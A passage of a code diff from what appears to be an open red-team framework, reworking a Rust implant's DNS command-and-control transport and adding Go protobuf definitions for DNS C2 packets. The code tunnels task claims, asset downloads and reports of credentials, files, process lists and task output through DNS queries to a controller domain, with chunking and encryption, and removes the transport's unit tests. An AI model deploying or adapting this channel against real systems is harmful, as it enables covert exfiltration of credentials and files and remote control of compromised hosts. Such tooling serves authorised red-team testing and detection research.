A records) + // dns://8.8.8.8:53,1.1.1.1:53?domain=example.com&type=aaaa (multiple servers, AAAA records) + let url = if callback.starts_with("dns://") { + callback } else { - (url, None) + format!("dns://{}", callback) }; - let parts: Vec<&str> = server_domain.split('/').collect(); - - if parts.len() != 2 { - return Err(anyhow::anyhow!( - "Invalid DNS callback format. Expected: dns:///[?options]" - )); - } - - let dns_server = if parts[0] == SYSTEM_RESOLVER_WILDCARD { - // Use system resolver - None - } else if parts[0].contains(':') { - Some(parts[0].to_string()) - } else { - Some(format!("{}:{}", parts[0], DEFAULT_DNS_PORT)) - }; - - let base_domain = parts[1].to_string(); - - // Parse query parameters - let mut preferred_record_type = TXT_RECORD_TYPE; - let mut enable_fallback = true; - - if let Some(params) = query_params { - for param in params.split('&') { - if let Some((key, value)) = param.split_once('=') { - match key { - "type" => { - preferred_record_type = match value.to_uppercase().as_str() { - "TXT" => TXT_RECORD_TYPE, - "A" => A_RECORD_TYPE, - "AAAA" => AAAA_RECORD_TYPE, - _ => { - return Err(anyhow::anyhow!( - "Invalid record type: {}. Expected TXT, A, or AAAA", - value - )) - } - }; - } - "fallback" => { - enable_fallback = match value.to_lowercase().as_str() { - "true" | "1" | "yes" => true, - "false" | "0" | "no" => false, - _ => { - return Err(anyhow::anyhow!( - "Invalid fallback value: {}. Expected true or false", - value - )) - } - }; + let parsed = url::Url::parse(&url)?; + let base_domain = parsed + .query_pairs() + .find(|(k, _)| k == "domain") + .map(|(_, v)| v.to_string()) + .unwrap_or_else(|| "example.com".to_string()); + + // Parse record type from URL (default: TXT) + let record_type = parsed + .query_pairs() + .find(|(k, _)| k == "type") + .map(|(_, v)| match v.to_lowercase().as_str() { + "a" => DnsRecordType::A, + "aaaa" => DnsRecordType::AAAA, + _ => DnsRecordType::TXT, + }) + .unwrap_or(DnsRecordType::TXT); + + let mut dns_servers = Vec::new(); + + // Check if using wildcard for system DNS + if let Some(host) = parsed.host_str() { + if host == "*" { + // Use system DNS servers + fallbacks + #[cfg(feature = "dns")] + { + use hickory_resolver::system_conf::read_system_conf; + if let Ok((config, _opts)) = read_system_conf() { + for server in config.name_servers() { + dns_servers.push(format!("{}:53", server.socket_addr.ip())); } - _ => {} // Ignore unknown parameters } } + // Add fallbacks + dns_servers.extend(FALLBACK_DNS_SERVERS.iter().map(|s| s.to_string())); + } else { + // Parse comma-separated servers or single server + for server_part in host.split(',') { + let server = server_part.trim(); + let port = parsed.port().unwrap_or(53); + dns_servers.push(format!("{}:{}", server, port)); + } } } - // Build resolver array if using system resolver (dns_server is None) - let dns_resolvers = if dns_server.is_none() { - build_resolver_array() - } else { - Vec::new() - }; + // If no servers configured, use fallbacks + if dns_servers.is_empty() { + dns_servers.extend(FALLBACK_DNS_SERVERS.iter().map(|s| s.to_string())); + } Ok(DNS { - dns_server, - dns_resolvers, - current_resolver_index: 0, base_domain, - socket: None, - preferred_record_type, - current_record_type: preferred_record_type, // Start with preferred type - enable_fallback, + dns_servers, + current_server_index: 0, + record_type, }) } async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { - self.unary_rpc(request, CLAIM_TASKS_PATH).await + self.dns_exchange(request, "/c2.C2/ClaimTasks").await } async fn fetch_asset( &mut self, request: FetchAssetRequest, - tx: Sender, + sender: Sender, ) -> Result<()> { - #[cfg(debug_assertions)] - let filename = request.name.clone(); + // Send fetch request and get raw response bytes + let response_bytes = self.dns_exchange_raw( + Self::marshal_with_codec::(request)?, + "/c2.C2/FetchAsset" + ).await?; - // Marshal request - let request_bytes = marshal_with_codec::(request)?; - - // Send via DNS and get streaming response - let response_bytes = self.dns_exchange(FETCH_ASSET_PATH, &request_bytes).await?; - - // For streaming responses, we need to chunk them - // The response contains multiple FetchAssetResponse messages concatenated + // Parse length-prefixed encrypted chunks and send each one let mut offset = 0; while offset < response_bytes.len() { + // Check if we have enough bytes for length prefix if offset + 4 > response_bytes.len() { break; } - // Read message length (first 4 bytes) - let msg_len = u32::from_be_bytes([ + // Read 4-byte length prefix (big-endian) + let chunk_len = u32::from_be_bytes([ response_bytes[offset], response_bytes[offset + 1], response_bytes[offset + 2], @@ -1438,33 +588,26 @@ impl Transport for DNS { ]) as usize; offset += 4; - if offset + msg_len > response_bytes.len() { - break; + // Check if we have the full chunk + if offset + chunk_len > response_bytes.len() { + return Err(anyhow::anyhow!( + "Invalid chunk length: {} bytes at offset {}, total size {}", + chunk_len, + offset - 4, + response_bytes.len() + )); } - // Decrypt and decode message - match unmarshal_with_codec::( - &response_bytes[offset..offset + msg_len], - ) { - Ok(msg) => { - if tx.send(msg).is_err() { - #[cfg(debug_assertions)] - log::error!("Failed to send asset chunk: {}", filename); - break; - } - } - Err(_err) => { - #[cfg(debug_assertions)] - log::error!( - "Failed to decrypt/decode asset chunk: {}: {}", - filename, - _err - ); - break; - } + // Extract and decrypt chunk + let encrypted_chunk = &response_bytes[offset..offset + chunk_len]; + let chunk_response = Self::unmarshal_with_codec::(encrypted_chunk)?; + + // Send chunk through channel + if sender.send(chunk_response).is_err() { + return Err(anyhow::anyhow!("Failed to send chunk: receiver dropped")); } - offset += msg_len; + offset += chunk_len; } Ok(()) @@ -1474,76 +617,59 @@ impl Transport for DNS { &mut self, request: ReportCredentialRequest, ) -> Result { - self.unary_rpc(request, REPORT_CREDENTIAL_PATH).await + self.dns_exchange(request, "/c2.C2/ReportCredential").await } async fn report_file( &mut self, request: Receiver, ) -> Result { - #[cfg(debug_assertions)] - log::debug!("report_file: starting to collect chunks"); - // Spawn a task to collect chunks from the sync channel receiver // This is necessary because iterating over the sync receiver would block the async task let handle = tokio::spawn(async move { let mut all_chunks = Vec::new(); // Iterate over the sync channel receiver in a spawned task to avoid blocking - #[cfg(debug_assertions)] - let mut chunk_count = 0; - for chunk in request { - #[cfg(debug_assertions)] - { - chunk_count += 1; - } - let chunk_bytes = - marshal_with_codec::(chunk)?; + // Encrypt each chunk individually (like old implementation) + let chunk_bytes = Self::marshal_with_codec::(chunk)?; + // Prefix each chunk with its length (4 bytes, big-endian) all_chunks.extend_from_slice(&(chunk_bytes.len() as u32).to_be_bytes()); all_chunks.extend_from_slice(&chunk_bytes); } - #[cfg(debug_assertions)] - log::debug!( - "report_file: collected {} chunks, total {} bytes", - chunk_count, - all_chunks.len() - ); - Ok::, anyhow::Error>(all_chunks) }); // Wait for the spawned task to complete - let all_chunks = handle - .await - .context("Failed to join chunk collection task")??; + let all_chunks = handle.await + .map_err(|e| anyhow::anyhow!("Failed to join chunk collection task: {}", e))??; - // Send via DNS - let response_bytes = self.dns_exchange(REPORT_FILE_PATH, &all_chunks).await?; + if all_chunks.is_empty() { + return Err(anyhow::anyhow!("No file data provided")); + } - #[cfg(debug_assertions)] - log::debug!( - "report_file: received response, {} bytes", - response_bytes.len() - ); + // Send all chunks as a single DNS exchange (chunks are already individually encrypted) + // This is RAW data - multiple length-prefixed encrypted messages concatenated + // Do NOT encrypt again - pass directly to server + let response_bytes = self.dns_exchange_raw(all_chunks, "/c2.C2/ReportFile").await?; // Unmarshal response - unmarshal_with_codec::(&response_bytes) + Self::unmarshal_with_codec::(&response_bytes) } async fn report_process_list( &mut self, request: ReportProcessListRequest, ) -> Result { - self.unary_rpc(request, REPORT_PROCESS_LIST_PATH).await + self.dns_exchange(request, "/c2.C2/ReportProcessList").await } async fn report_task_output( &mut self, request: ReportTaskOutputRequest, ) -> Result { - self.unary_rpc(request, REPORT_TASK_OUTPUT_PATH).await + self.dns_exchange(request, "/c2.C2/ReportTaskOutput").await } async fn reverse_shell( @@ -1551,278 +677,6 @@ impl Transport for DNS { _rx: tokio::sync::mpsc::Receiver, _tx: tokio::sync::mpsc::Sender, ) -> Result<()> { - Err(anyhow::anyhow!( - "DNS transport does not support reverse shell" - )) - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_dns_init_defaults() { - let dns = DNS::init(); - - assert!(dns.dns_server.is_none()); - assert!(dns.base_domain.is_empty()); - assert_eq!(dns.preferred_record_type, TXT_RECORD_TYPE); - assert_eq!(dns.current_record_type, TXT_RECORD_TYPE); - assert!(dns.enable_fallback); - } - - #[test] - fn test_dns_new_parses_callback() { - // Test with specific DNS server - let dns = DNS::new("dns://8.8.8.8/c2.example.com".to_string(), None).unwrap(); - assert_eq!(dns.dns_server, Some("8.8.8.8:53".to_string())); - assert_eq!(dns.base_domain, "c2.example.com"); - assert_eq!(dns.preferred_record_type, TXT_RECORD_TYPE); - assert!(dns.enable_fallback); - - // Test with system resolver (*) - let dns = DNS::new("dns://*/c2.example.com".to_string(), None).unwrap(); - assert!(dns.dns_server.is_none()); - assert_eq!(dns.base_domain, "c2.example.com"); - - // Test with A record type preference and fallback disabled - let dns = DNS::new( - "dns://*/c2.example.com?type=A&fallback=false".to_string(), - None, - ) - .unwrap(); - assert_eq!(dns.preferred_record_type, A_RECORD_TYPE); - assert_eq!(dns.current_record_type, A_RECORD_TYPE); - assert!(!dns.enable_fallback); - } - - #[test] - fn test_dns_new_invalid_type_errors() { - let result = DNS::new("dns://8.8.8.8/c2.example.com?type=BOGUS".to_string(), None); - assert!(result.is_err()); - let err_msg = result.unwrap_err().to_string(); - assert!(err_msg.contains("type") || err_msg.contains("BOGUS")); - } - - #[test] - fn test_calculate_max_data_size_positive() { - let dns = DNS { - dns_server: None, - dns_resolvers: Vec::new(), - current_resolver_index: 0, - base_domain: "c2.example.com".to_string(), - socket: None, - preferred_record_type: TXT_RECORD_TYPE, - current_record_type: TXT_RECORD_TYPE, - enable_fallback: true, - }; - - let max_size = dns.calculate_max_data_size(); - assert!(max_size > 0, "max data size should be positive"); - - // Test with a very long base domain - should be smaller - let dns_long = DNS { - dns_server: None, - dns_resolvers: Vec::new(), - current_resolver_index: 0, - base_domain: "very.long.subdomain.hierarchy.for.testing.purposes.c2.example.com" - .to_string(), - socket: None, - preferred_record_type: TXT_RECORD_TYPE, - current_record_type: TXT_RECORD_TYPE, - enable_fallback: true, - }; - - let max_size_long = dns_long.calculate_max_data_size(); - assert!(max_size_long > 0, "long domain max size should be positive"); - assert!( - max_size_long < max_size, - "longer domain should reduce available data size" - ); - } - - #[test] - fn test_generate_conv_id_length() { - let id = DNS::generate_conv_id(); - assert_eq!(id.len(), CONV_ID_SIZE); - - // Verify all characters are base32 lowercase (a-z0-7) - for c in id.chars() { - assert!( - c.is_ascii_lowercase() || c.is_ascii_digit(), - "conv_id should contain only lowercase alphanumeric chars" - ); - } - } - - #[test] - fn test_encode_decode_seq() { - // Test round-trip encoding/decoding - let test_values = vec![0, 1, 42, 1234, 60466175]; // Max is 36^5 - 1 - - for val in test_values { - let encoded = DNS::encode_seq(val); - assert_eq!(encoded.len(), SEQ_SIZE); - - let decoded = DNS::decode_seq(&encoded).unwrap(); - assert_eq!(decoded, val, "seq {} should round-trip correctly", val); - } - } - - #[test] - fn test_encode_decode_base36_crc() { - // Test round-trip encoding/decoding - let test_crcs = vec![0, 1, 255, 12345, 65535]; // 16-bit values - - for crc in test_crcs { - let encoded = DNS::encode_base36_crc(crc as u16); - assert_eq!(encoded.len(), 4); - - let decoded = DNS::decode_base36_crc(&encoded).unwrap(); - assert_eq!( - decoded, crc as u16, - "CRC {} should round-trip correctly", - crc - ); - } - } - - #[test] - fn test_calculate_crc16() { - // Test with known data - let data1 = b"hello world"; - let crc1 = DNS::calculate_crc16(data1); - assert!(crc1 > 0, "CRC should be non-zero for non-empty data"); - - // Same data should produce same CRC - let crc1_again = DNS::calculate_crc16(data1); - assert_eq!(crc1, crc1_again, "CRC should be deterministic"); - - // Different data should produce different CRC (highly likely) - let data2 = b"hello world!"; - let crc2 = DNS::calculate_crc16(data2); - assert_ne!(crc1, crc2, "different data should produce different CRC"); - } - - #[tokio::test] - async fn test_handle_response_ok_prefix() { - // Create a mock DNS instance - let mut dns = DNS::init(); - dns.base_domain = "example.com".to_string(); - - // Simple test data - let test_data = b"test response data"; - let encoded_data = DNS::encode_base32(test_data); - let response = format!("{}{}", RESP_OK, encoded_data); - - // Call handle_response with empty chunks (no retries needed) - let conv_id = "test12345678"; - let chunks: Vec> = vec![]; - - let result = dns - .handle_response(conv_id, response.as_bytes(), &chunks, 0) - .await; - - assert!(result.is_ok()); - let decoded = result.unwrap(); - assert_eq!(decoded, test_data); - } - - #[tokio::test] - async fn test_handle_response_error_prefix() { - let mut dns = DNS::init(); - dns.base_domain = "example.com".to_string(); - - let response = b"e:something_broke"; - let conv_id = "test12345678"; - let chunks: Vec> = vec![]; - - let result = dns.handle_response(conv_id, response, &chunks, 0).await; - - assert!(result.is_err()); - let err_msg = result.unwrap_err().to_string(); - assert!(err_msg.contains("something_broke") || err_msg.contains("error")); - } - - #[tokio::test] - async fn test_handle_response_missing_prefix() { - let mut dns = DNS::init(); - dns.base_domain = "example.com".to_string(); - - // Missing chunks response - should trigger retry or error - let response = b"m:00000,00001,00002"; - let conv_id = "test12345678"; - let chunks: Vec> = vec![b"chunk0".to_vec(), b"chunk1".to_vec()]; - - // With retry_count at max, this should error out - let result = dns.handle_response(conv_id, response, &chunks, 5).await; - - // Should either error or handle the missing chunks - // Since we're at max retries, it should error - assert!(result.is_err()); - } - - #[tokio::test] - async fn test_reverse_shell_not_supported() { - let mut dns = DNS::init(); - - let (_tx, rx) = tokio::sync::mpsc::channel(1); - let (resp_tx, _resp_rx) = tokio::sync::mpsc::channel(1); - - let result = dns.reverse_shell(rx, resp_tx).await; - - assert!(result.is_err()); - let err_msg = result.unwrap_err().to_string(); - assert!(err_msg.contains("reverse shell") || err_msg.contains("not support")); - } - - #[test] - fn test_dns_new_with_wildcard_builds_resolver_array() { - let dns = DNS::new("dns://*/c2.example.com".to_string(), None).unwrap(); - - assert!( - dns.dns_server.is_none(), - "dns_server should be None for wildcard" - ); - assert!( - !dns.dns_resolvers.is_empty(), - "dns_resolvers array should be populated" - ); - - // Should always have at least Cloudflare and Google fallbacks - assert!( - dns.dns_resolvers.len() >= 2, - "Should have at least 2 resolvers (fallbacks)" - ); - - // Check that Cloudflare and Google are in the list (they should be at the end) - let has_cloudflare = dns.dns_resolvers.iter().any(|s| s == "1.1.1.1:53"); - let has_google = dns.dns_resolvers.iter().any(|s| s == "8.8.8.8:53"); - - assert!( - has_cloudflare, - "Should have Cloudflare (1.1.1.1:53) in resolver list" - ); - assert!( - has_google, - "Should have Google (8.8.8.8:53) in resolver list" - ); - - assert_eq!(dns.current_resolver_index, 0, "Should start at index 0"); - - #[cfg(debug_assertions)] - println!("Resolver array: {:?}", dns.dns_resolvers); - } - - #[test] - fn test_dns_new_with_explicit_server_no_resolver_array() { - let dns = DNS::new("dns://8.8.8.8/c2.example.com".to_string(), None).unwrap(); - - assert_eq!(dns.dns_server, Some("8.8.8.8:53".to_string())); - assert!( - dns.dns_resolvers.is_empty(), - "dns_resolvers should be empty with explicit server" - ); + Err(anyhow::anyhow!("reverse_shell not supported over DNS transport")) } } diff --git a/tavern/internal/c2/dnspb/dns.pb.go b/tavern/internal/c2/dnspb/dns.pb.go new file mode 100644 index 000000000..00ad5e99f --- /dev/null +++ b/tavern/internal/c2/dnspb/dns.pb.go @@ -0,0 +1,414 @@ +// Code generated by protoc-gen-go. DO NOT EDIT. +// versions: +// protoc-gen-go v1.36.11 +// protoc v6.32.0 +// source: dns.proto + +package dnspb + +import ( + protoreflect "google.golang.org/protobuf/reflect/protoreflect" + protoimpl "google.golang.org/protobuf/runtime/protoimpl" + reflect "reflect" + sync "sync" + unsafe "unsafe" +) + +const ( + // Verify that this generated code is sufficiently up-to-date. + _ = protoimpl.EnforceVersion(20 - protoimpl.MinVersion) + // Verify that runtime/protoimpl is sufficiently up-to-date. + _ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20) +) + +// PacketType defines the type of DNS packet in the conversation +type PacketType int32 + +const ( + PacketType_PACKET_TYPE_UNSPECIFIED PacketType = 0 + PacketType_PACKET_TYPE_INIT PacketType = 1 // Establish conversation + PacketType_PACKET_TYPE_DATA PacketType = 2 // Send data chunk + PacketType_PACKET_TYPE_END PacketType = 3 // Finalize request + PacketType_PACKET_TYPE_FETCH PacketType = 4 // Retrieve response chunk +) + +// Enum value maps for PacketType. +var ( + PacketType_name = map[int32]string{ + 0: "PACKET_TYPE_UNSPECIFIED", + 1: "PACKET_TYPE_INIT", + 2: "PACKET_TYPE_DATA", + 3: "PACKET_TYPE_END", + 4: "PACKET_TYPE_FETCH", + } + PacketType_value = map[string]int32{ + "PACKET_TYPE_UNSPECIFIED": 0, + "PACKET_TYPE_INIT": 1, + "PACKET_TYPE_DATA": 2, + "PACKET_TYPE_END": 3, + "PACKET_TYPE_FETCH": 4, + } +) + +func (x PacketType) Enum() *PacketType { + p := new(PacketType) + *p = x + return p +} + +func (x PacketType) String() string { + return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x)) +} + +func (PacketType) Descriptor() protoreflect.EnumDescriptor { + return file_dns_proto_enumTypes[0].Descriptor() +} + +func (PacketType) Type() protoreflect.EnumType { + return &file_dns_proto_enumTypes[0] +} + +func (x PacketType) Number() protoreflect.EnumNumber { + return protoreflect.EnumNumber(x) +} + +// Deprecated: Use PacketType.Descriptor instead. +func (PacketType) EnumDescriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{0} +} + +// DNSPacket is the main message format for DNS C2 communication +// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +type DNSPacket struct { + state protoimpl.MessageState `protogen:"open.v1"` + Type PacketType `protobuf:"varint,1,opt,name=type,proto3,enum=dns.PacketType" json:"type,omitempty"` // Packet type + Sequence uint32 `protobuf:"varint,2,opt,name=sequence,proto3" json:"sequence,omitempty"` // Chunk sequence number (0-based) + ConversationId string `protobuf:"bytes,3,opt,name=conversation_id,json=conversationId,proto3" json:"conversation_id,omitempty"` // 12-character random conversation ID + Data []byte `protobuf:"bytes,4,opt,name=data,proto3" json:"data,omitempty"` // Chunk payload (or InitPayload for INIT packets) + Crc32 uint32 `protobuf:"varint,5,opt,name=crc32,proto3" json:"crc32,omitempty"` // Optional CRC32 for validation + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *DNSPacket) Reset() { + *x = DNSPacket{} + mi := &file_dns_proto_msgTypes[0] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *DNSPacket) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*DNSPacket) ProtoMessage() {} + +func (x *DNSPacket) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[0] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use DNSPacket.ProtoReflect.Descriptor instead. +func (*DNSPacket) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{0} +} + +func (x *DNSPacket) GetType() PacketType { + if x != nil { + return x.Type + } + return PacketType_PACKET_TYPE_UNSPECIFIED +} + +func (x *DNSPacket) GetSequence() uint32 { + if x != nil { + return x.Sequence + } + return 0 +} + +func (x *DNSPacket) GetConversationId() string { + if x != nil { + return x.ConversationId + } + return "" +} + +func (x *DNSPacket) GetData() []byte { + if x != nil { + return x.Data + } + return nil +} + +func (x *DNSPacket) GetCrc32() uint32 { + if x != nil { + return x.Crc32 + } + return 0 +} + +// InitPayload is the payload for INIT packets +// It contains metadata about the upcoming data transmission +type InitPayload struct { + state protoimpl.MessageState `protogen:"open.v1"` + MethodCode string `protobuf:"bytes,1,opt,name=method_code,json=methodCode,proto3" json:"method_code,omitempty"` // 2-character gRPC method code (e.g., "ct", "fa") + TotalChunks uint32 `protobuf:"varint,2,opt,name=total_chunks,json=totalChunks,proto3" json:"total_chunks,omitempty"` // Total number of data chunks to expect + DataCrc32 uint32 `protobuf:"varint,3,opt,name=data_crc32,json=dataCrc32,proto3" json:"data_crc32,omitempty"` // CRC32 checksum of complete request data + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *InitPayload) Reset() { + *x = InitPayload{} + mi := &file_dns_proto_msgTypes[1] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *InitPayload) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*InitPayload) ProtoMessage() {} + +func (x *InitPayload) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[1] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use InitPayload.ProtoReflect.Descriptor instead. +func (*InitPayload) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{1} +} + +func (x *InitPayload) GetMethodCode() string { + if x != nil { + return x.MethodCode + } + return "" +} + +func (x *InitPayload) GetTotalChunks() uint32 { + if x != nil { + return x.TotalChunks + } + return 0 +} + +func (x *InitPayload) GetDataCrc32() uint32 { + if x != nil { + return x.DataCrc32 + } + return 0 +} + +// FetchPayload is the payload for FETCH packets +// It specifies which response chunk to retrieve +type FetchPayload struct { + state protoimpl.MessageState `protogen:"open.v1"` + ChunkIndex uint32 `protobuf:"varint,1,opt,name=chunk_index,json=chunkIndex,proto3" json:"chunk_index,omitempty"` // Which chunk to fetch (0-based) + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *FetchPayload) Reset() { + *x = FetchPayload{} + mi := &file_dns_proto_msgTypes[2] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *FetchPayload) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*FetchPayload) ProtoMessage() {} + +func (x *FetchPayload) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[2] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use FetchPayload.ProtoReflect.Descriptor instead. +func (*FetchPayload) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{2} +} + +func (x *FetchPayload) GetChunkIndex() uint32 { + if x != nil { + return x.ChunkIndex + } + return 0 +} + +// ResponseMetadata indicates the response is chunked and must be fetched +type ResponseMetadata struct { + state protoimpl.MessageState `protogen:"open.v1"` + TotalChunks uint32 `protobuf:"varint,1,opt,name=total_chunks,json=totalChunks,proto3" json:"total_chunks,omitempty"` // Total number of response chunks + DataCrc32 uint32 `protobuf:"varint,2,opt,name=data_crc32,json=dataCrc32,proto3" json:"data_crc32,omitempty"` // CRC32 checksum of complete response data + ChunkSize uint32 `protobuf:"varint,3,opt,name=chunk_size,json=chunkSize,proto3" json:"chunk_size,omitempty"` // Size of each chunk (last may be smaller) + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *ResponseMetadata) Reset() { + *x = ResponseMetadata{} + mi := &file_dns_proto_msgTypes[3] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *ResponseMetadata) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*ResponseMetadata) ProtoMessage() {} + +func (x *ResponseMetadata) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[3] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use ResponseMetadata.ProtoReflect.Descriptor instead. +func (*ResponseMetadata) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{3} +} + +func (x *ResponseMetadata) GetTotalChunks() uint32 { + if x != nil { + return x.TotalChunks + } + return 0 +} + +func (x *ResponseMetadata) GetDataCrc32() uint32 { + if x != nil { + return x.DataCrc32 + } + return 0 +} + +func (x *ResponseMetadata) GetChunkSize() uint32 { + if x != nil { + return x.ChunkSize + } + return 0 +} + +var File_dns_proto protoreflect.FileDescriptor + +const file_dns_proto_rawDesc = "" + + "\n" + + "\tdns.proto\x12\x03dns\"\x9f\x01\n" + + "\tDNSPacket\x12#\n" + + "\x04type\x18\x01 \x01(\x0e2\x0f.dns.PacketTypeR\x04type\x12\x1a\n" + + "\bsequence\x18\x02 \x01(\rR\bsequence\x12'\n" + + "\x0fconversation_id\x18\x03 \x01(\tR\x0econversationId\x12\x12\n" + + "\x04data\x18\x04 \x01(\fR\x04data\x12\x14\n" + + "\x05crc32\x18\x05 \x01(\rR\x05crc32\"p\n" + + "\vInitPayload\x12\x1f\n" + + "\vmethod_code\x18\x01 \x01(\tR\n" + + "methodCode\x12!\n" + + "\ftotal_chunks\x18\x02 \x01(\rR\vtotalChunks\x12\x1d\n" + + "\n" + + "data_crc32\x18\x03 \x01(\rR\tdataCrc32\"/\n" + + "\fFetchPayload\x12\x1f\n" + + "\vchunk_index\x18\x01 \x01(\rR\n" + + "chunkIndex\"s\n" + + "\x10ResponseMetadata\x12!\n" + + "\ftotal_chunks\x18\x01 \x01(\rR\vtotalChunks\x12\x1d\n" + + "\n" + + "data_crc32\x18\x02 \x01(\rR\tdataCrc32\x12\x1d\n" + + "\n" + + "chunk_size\x18\x03 \x01(\rR\tchunkSize*\x81\x01\n" + + "\n" + + "PacketType\x12\x1b\n" + + "\x17PACKET_TYPE_UNSPECIFIED\x10\x00\x12\x14\n" + + "\x10PACKET_TYPE_INIT\x10\x01\x12\x14\n" + + "\x10PACKET_TYPE_DATA\x10\x02\x12\x13\n" + + "\x0fPACKET_TYPE_END\x10\x03\x12\x15\n" + + "\x11PACKET_TYPE_FETCH\x10\x04B$Z\"realm.pub/tavern/internal/c2/dnspbb\x06proto3" + +var ( + file_dns_proto_rawDescOnce sync.Once + file_dns_proto_rawDescData []byte +) + +func file_dns_proto_rawDescGZIP() []byte { + file_dns_proto_rawDescOnce.Do(func() { + file_dns_proto_rawDescData = protoimpl.X.CompressGZIP(unsafe.Slice(unsafe.StringData(file_dns_proto_rawDesc), len(file_dns_proto_rawDesc))) + }) + return file_dns_proto_rawDescData +} + +var file_dns_proto_enumTypes = make([]protoimpl.EnumInfo, 1) +var file_dns_proto_msgTypes = make([]protoimpl.MessageInfo, 4) +var file_dns_proto_goTypes = []any{ + (PacketType)(0), // 0: dns.PacketType + (*DNSPacket)(nil), // 1: dns.DNSPacket + (*InitPayload)(nil), // 2: dns.InitPayload + (*FetchPayload)(nil), // 3: dns.FetchPayload + (*ResponseMetadata)(nil), // 4: dns.ResponseMetadata +} +var file_dns_proto_depIdxs = []int32{ + 0, // 0: dns.DNSPacket.type:type_name -> dns.PacketType + 1, // [1:1] is the sub-list for method output_type + 1, // [1:1] is the sub-list for method input_type + 1, // [1:1] is the sub-list for extension type_name + 1, // [1:1] is the sub-list for extension extendee + 0, // [0:1] is the sub-list for field type_name +} + +func init() { file_dns_proto_init() } +func file_dns_proto_init() { + if File_dns_proto != nil { + return + } + type x struct{} + out := protoimpl.TypeBuilder{ + File: protoimpl.DescBuilder{ + GoPackagePath: reflect.TypeOf(x{}).PkgPath(), + RawDescriptor: unsafe.Slice(unsafe.StringData(file_dns_proto_rawDesc), len(file_dns_proto_rawDesc)), + NumEnums: 1, + NumMessages: 4, + NumExtensions: 0, + NumServices: 0, + }, + GoTypes: file_dns_proto_goTypes, + DependencyIndexes: file_dns_proto_depIdxs, + EnumInfos: file_dns_proto_enumTypes, + MessageInfos: file_dns_proto_msgTypes, + }.Build() + File_dns_proto = out.File + file_dns_proto_goTypes = nil + file_dns_proto_depIdxs = nil +} diff --git a/tavern/internal/c2/generate.go b/tavern/internal/c2/generate.go index d8238b97c..31f03d2b5 100644 --- a/tavern/internal/c2/generate.go +++ b/tavern/internal/c2/generate.go @@ -2,3 +2,4 @@ package c2 //go:generate protoc -I=./proto --go_out=./epb --go_opt=paths=source_relative --go-grpc_out=./epb --go-grpc_opt=paths=source_relative eldritch.proto //go:generate protoc -I=./proto --go_out=./c2pb --go_opt=paths=source_relative --go-grpc_out=./c2pb --go-grpc_opt=paths=source_relative c2.proto +//go:generate protoc -I=./proto --go_out=./dnspb --go_opt=paths=source_relative dns.proto diff --git a/tavern/internal/c2/proto/dns.proto b/tavern/internal/c2/proto/dns.proto new file mode 100644 index 000000000..1c9d4d2d9 --- /dev/null +++ b/tavern/internal/c2/proto/dns.proto @@ -0,0 +1,45 @@ +syntax = "proto3"; + +package dns; + +option go_package = "realm.pub/tavern/internal/c2/dnspb"; + +// PacketType defines the type of DNS packet in the conversation +enum PacketType { + PACKET_TYPE_UNSPECIFIED = 0; + PACKET_TYPE_INIT = 1; // Establish conversation + PACKET_TYPE_DATA = 2; // Send data chunk + PACKET_TYPE_END = 3; // Finalize request + PACKET_TYPE_FETCH = 4; // Retrieve response chunk +} + +// DNSPacket is the main message format for DNS C2 communication +// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +message DNSPacket { + PacketType type = 1; // Packet type + uint32 sequence = 2; // Chunk sequence number (0-based) + string conversation_id = 3; // 12-character random conversation ID + bytes data = 4; // Chunk payload (or InitPayload for INIT packets) + uint32 crc32 = 5; // Optional CRC32 for validation +} + +// InitPayload is the payload for INIT packets +// It contains metadata about the upcoming data transmission +message InitPayload { + string method_code = 1; // 2-character gRPC method code (e.g., "ct", "fa") + uint32 total_chunks = 2; // Total number of data chunks to expect + uint32 data_crc32 = 3; // CRC32 